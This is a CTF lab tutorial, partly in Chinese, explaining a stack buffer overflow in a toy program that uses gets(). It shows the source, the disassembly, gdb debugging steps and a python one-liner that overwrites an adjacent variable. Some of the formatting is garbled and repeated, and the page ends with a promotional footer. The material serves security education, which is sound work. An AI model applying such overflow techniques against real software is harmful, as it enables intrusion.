PWN is a slang word in hacker grammar, which is derived from the word "own". This term is traditionally used in online gaming culture to mock a competitor who has been completely defeated in an entire game battle (for example: "You
just got pwned!"). There is a very famous international competition called Pwn2Own, that is to achieve the purpose of possession by defeating the opponent.
In the CTF, the PWN question type usually directly gives a compiled binary program (EXE under Windows or ELF file under Linux, etc.), and then the contestants find the exploit loopholes by reverse analyzing and debugging the binary program, and Write the exploit code, achieve the effect of overflow attack through remote code execution, and finally get the shell of the target machine to capture the flag.
It's time to introduce tools again! First understand gdb.
gdb is a commonly used command-line debugger under Linux, which has very powerful debugging functions. The gdb commands needed in this experiment are as follows:
This tool is similar to artifacts like IDA in reverse engineering.
In addition to tools, you also need to know some simple assembly basics. Understanding common assembly instructions is the basic requirement for PWN problem solving in the CTF competition. The assembly instructions that need to be understood in this experiment are as follows:
In assembly language, the esp register is used to indicate the position of the stack top of the current function stack frame. The local variables in the function are all stored in the stack space, and the growth direction of the stack is downward (that is, from high address to low address).
Buffer overflow means that when the computer fills the buffer with more than the capacity of the buffer itself, the overflowed data is overwritten on the legal data. The ideal situation is that the program checks the data length and does not allow the input to exceed the buffer length. characters, but most programs assume that the data length always matches the allocated storage space, which creates hidden dangers for buffer overflows.
This article involves practical exercises of knowledge points:
["CTFPWN Practice"](https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182014103116591300001&pk_campaign=freebuf-wemedia
) (PWN is the main question in the CTF competition One of the types, it mainly examines the reverse analysis, vulnerability mining and Exploit writing ability of the contestants. The CTF-
PWN series of experiments takes the most common stack overflow as the main line, and explains the principle and practice of stack overflow attacks step by step through a shallower to deeper way. At the same time, it introduces in detail the basic usage of GDB debugger under Linux.).
First look at the title description, which is as important as looking at the web source code. There is a pwn1 program in the host /home/test/1 directory. When executing this program, you can input data for testing. The pwn1 program will output the prompt message Please try again.
Please Perform reverse analysis and debugging on the pwn1 program, find the loopholes inside the program, and construct special input data to make it output Congratulations,
you pwned it. information.
First of all, the first step of source code audit is generally not to provide the source code of the binary program in the PWN topic of the actual CTF competition. In order to facilitate everyone's learning, the C language source code of the binary program is given for everyone to analyze, and the source code audit method is used to determine the location of the vulnerability, which is convenient for subsequent analysis at the assembly level.
(In the absence of source code, we usually use IDA Pro to reverse analyze the binary program. Using IDA's Hex-Rays
plug-in can restore the disassembly code to C language pseudocode, which can achieve a readable effect similar to source code. In the later experiments, the use of IDA will be specifically explained)
Use cd /home/test/1 to switch to the directory where the program is located, and execute cat pwn1.c to see the source code:
``#include <stdio.h>int main(int argc, char argv){int modified;char buffer[64];modified = 0;gets(buffer); // 引发缓冲区溢出if (modified != 0){printf(“Congratulations, you pwned it.\n”);}else{printf(“Please try again.\n”);}return 0;}
我们看这里使用gets函数读取输入数据时,并不会对buffer缓冲区的长度进行检查,输入超长的输入数据时会引发缓冲区溢出。
漏洞找到了,我们来看利用过程执行gdb pwn1即可开始通过gdb对pwn1进行调试,现在我们需要阅读main函数的汇编代码,在gdb中执行disas
main命令即可:
下面是对main函数中的汇编代码的解释:
``0x080482a0 <+0>: push %ebp0x080482a1 <+1>: mov %esp,%\ebp0x080482a3 <+3>: and $0xfffffff0,%\esp; esp = esp - 0x60,即在栈上分配0x60)字节的空间0x080482a6 <+6>: sub $0x60,%\esp; modified变量位于esp + 0x5C处,将其初始化为00x080482a9 <+9>: movl $0x0,0x5c(%\esp); buffer位于esp + 0x1C处0x080482b1 <+17>: lea 0x1c(%\esp),%eax0x080482b5 <+21>: mov %eax,(%\esp); 调用gets(buffer)读取输入数据0x080482b8 <+24>: call 0x8049360 <gets>; 判断modified变量的值是否是00x080482bd <+29>: cmpl $0x0,0x5c(%\esp); 如果modified的值等于0,就跳转到 0x080482d20x080482c2 <+34>: je 0x80482d2 <main+50>; modified不为0,打印成功提示0x080482c4 <+36>: movl $0x80b3eec,(%\esp)0x080482cb <+43>: call 0x8049500 <puts>0x080482d0 <+48>: jmp 0x80482de <main+62>; modified为0,打印失败提示0x080482d2 <+50>: movl $0x80b3f0b,(%\esp)0x080482d9 <+57>: call 0x8049500 <puts>0x080482de <+62>: mov $0x0,%\eax0x080482e3 <+67>: leave0x080482e4 <+68>: ret``
``
通过对上面的汇编代码进行分析,我们知道buffer位于esp+0x1C处,而modified位于esp+0x5C处,两个地址的距离为0x5C - 0x1C
= 0x40,即64,刚好为buffer数组的大小。因此当我们输入的数据超过64字节时,modified变量就可以被覆盖。
下面在gdb中进行验证,在gdb中执行b 0x080482bd命令对gets的下一条指令下一个断点:
在gdb中执行r命令,让被调试的pwn1程序跑起来,就可以输入数据进行测试了,这里我们输入64个A以及1个B(即AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB),按下Enter键程序就在断点处断下了:
在gdb中输入x
$esp+0x5C,查看modified变量的值已经被修改成了0x00000042,而0x42就是字符’B’的ASCII值,表明我们成功用输入数据的第65个字节覆盖了modified变量:
在gdb中连续两次执行ni命令,可以看到je指令没有跳转,说明modified的值不为0,程序进入输出通过信息的if语句分支:
在gdb中输入c命令就可以让程序继续执行,看到输出了通过提示信息:
通过上面的步骤我们已经知道了如果控制输入数据来进行攻击,以达到进入if语句分支的目的。下面我们就可以通过构造输入数据进行攻击了。
如果你还没有退出gdb,输入q命令就可以退出gdb。下面通过python语句构造输入数据,然后通过管道传给pwn1程序,执行命令python -c
"print 'A'64+'B'" | ./pwn1
看到已经成功发起了溢出攻击,程序被你PWN掉啦!
B'" | ./pwn1
[外链图片转存中...(img-oUak6lkK-1691677019926)]
看到已经成功发起了溢出攻击,程序被你PWN掉啦!
## 最后
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
**因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【点下方卡片】免费领取:**